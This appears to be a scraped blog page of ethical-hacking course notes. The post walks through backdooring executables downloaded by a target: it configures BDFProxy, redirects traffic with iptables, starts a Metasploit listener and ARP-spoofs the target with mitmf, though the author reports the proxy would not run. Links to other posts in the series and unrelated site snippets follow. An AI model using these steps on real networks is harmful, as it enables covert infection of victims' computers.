CLIENT SIDE ATTACKS

Backdoor delivery method2 - backdooring exe downloads

  • Backdoor any exe the target downloads.
  • We need to be in the middle of the connection.

Install bdfproxy following the guide on the website - https://packages.debian.org/sid/all/bdfproxy/download.

https://github.com/secretsquirrel/BDFProxy - No longer update or support.

1. Set IP address in config.

leafpad /etc/bdfproxy/bdfproxy.cfg

Change the proxyMode to transparent, so the target machine has Internet connection.

Change HOST IP address in WindowsIntel section, because our target is Windows machines.

2. Start dbfproxy

bdf_proxy

I met a problem to run bdf_proxy, and the offical website(https://github.com/secretsquirrel/BDFProxy) does NOT SUPPORT this program now.

I will continue to try to solve this problem later.

3. Redirect traffic to bafoxy.

iptables -t nat -A PREROUTING -p tcp --destination-port  -j REDIRECT --to-port

4. Start listening for connections

msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc

5. Start arp spoofing.

mitmf --arp --spoof --gateway [GATEWAY IP] --target [Target IP] -i [interface]

6. When done reset IP tables rules.

./flushiptables.sh

Ethical Hacking - GAINING ACCESS(13)的更多相关文章

  1. Ethical Hacking - GAINING ACCESS(1)

    Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not requi ...

  2. Ethical Hacking - GAINING ACCESS(23)

    CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and ...

  3. Ethical Hacking - GAINING ACCESS(22)

    CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number o ...

  4. Ethical Hacking - GAINING ACCESS(17)

    CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backd ...

  5. Ethical Hacking - GAINING ACCESS(10)

    CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interac ...

  6. Ethical Hacking - GAINING ACCESS(6)

    Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and ...

  7. Ethical Hacking - GAINING ACCESS(24)

    CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the prope ...

  8. Ethical Hacking - GAINING ACCESS(21)

    CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract ta ...

  9. Ethical Hacking - GAINING ACCESS(20)

    CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a s ...

随机推荐

  1. Beta冲刺<4/10>

    这个作业属于哪个课程 软件工程 (福州大学至诚学院 - 计算机工程系) 这个作业要求在哪里 Beta冲刺 这个作业的目标 Beta冲刺--第四天(05.22) 作业正文 如下 其他参考文献 ... B ...

  2. http 的8中请求方式:

    http 的8中请求方式: 1.OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2.HEAD 向服务器索与GET请求相一致 ...

  3. 第一章、认识Shiro

    Shiro简介 Apache Shiro是Java的一个安全框架.目前,使用Apache Shiro的人越来越多,因为它相当简单,对比Spring Security,可能没有Spring Securi ...

  4. Mac OS 生成 icon 和 ico 文件

    [本文版权归微信公众号"代码艺术"(ID:onblog)所有,若是转载请务必保留本段原创声明,违者必究.若是文章有不足之处,欢迎关注微信公众号私信与我进行交流!] 1. 生成 IC ...

  5. CentOS 7 Zookeeper 和 Kafka 集群搭建

    环境 CentOS 7.4 Zookeeper-3.6.1 Kafka_2.13-2.4.1 Kafka-manager-2.0.0.2 本次安装的软件全部在 /home/javateam 目录下. ...

  6. MongoDB入门二

    MongoDB配置 本地启动 c:\MongoDB\bin>mongod.exe --dbpath "C:\\MongoDB\data\db" --logpath " ...

  7. js语法基础入门(5.1)

    5.流程控制 5.1.选择结构 程序流程图 图例: 椭圆: 开始/结束 矩形: 操作 菱形: 判断 连接线: 走向 可以根据程序流程图,理清楚程序执行的流程 5.2.1.if语句 //if语句语法结构 ...

  8. JavaScript基础函数的属性:记忆模式(019)

    函数在Javascript里是有属性的,因为它们是一种特殊对象.事实上,就算是没有明确声明,函数在最初就已经包含了一些固有的属性,比如所有函数都length这个属性,它可以指出函数声明了多少个参数: ...

  9. 几个常见CSS错误和解决办法

    1.IE6下,当float存在时,margin双倍的问题 解决方法:加display:inline; 例: #content {    float: left;     width: 500px;   ...

  10. Isset、empty、count、is_null的比较

    1.empty判断变量是否为空, 先把变量转为布尔值再返回:对变量(字符串.数组等)赋值为一切为空的值.或者未定义的变量都返回true,即判断为空,比如null,' ',0,array(),false ...